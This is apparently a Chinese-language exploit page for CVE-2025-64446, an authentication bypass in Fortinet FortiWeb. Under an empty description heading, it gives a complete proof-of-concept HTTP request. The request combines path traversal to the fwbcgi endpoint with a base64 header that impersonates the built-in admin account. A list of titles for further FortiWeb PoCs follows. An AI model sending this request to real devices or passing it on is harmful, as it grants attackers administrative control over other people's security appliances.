Fortinet FortiWeb 未授权身份验证绕过漏洞（CVE-2025-64446）

漏洞描述

PoC代码

GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

相关漏洞推荐

• POC CVE-2025-64446: FortiWeb - Authentication Bypass
• Fortinet FortiWeb /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi 权限绕过漏洞（CVE-2025-64446）
• Fortiweb 存在路径穿越漏洞（CVE-2025-64446）
• POC CVE-2021-22122: FortiWeb - Cross Site Scripting
• POC CVE-2025-25257: Fortinet FortiWeb - SQL Injection
• POC CVE-2025-25257: Fortinet FortiWeb SQL注入漏洞
• Fortinet FortiWeb /api/fabric/device/status SQL 注入漏洞（CVE-2025-25257）
• Fortinet FortiWeb SQL注入漏洞
• Fortinet FortiWeb 存在SQL注入漏洞(CVE-2025-25257)
• Fortinet FortiWeb SQL注入漏洞(CVE-2025-25257)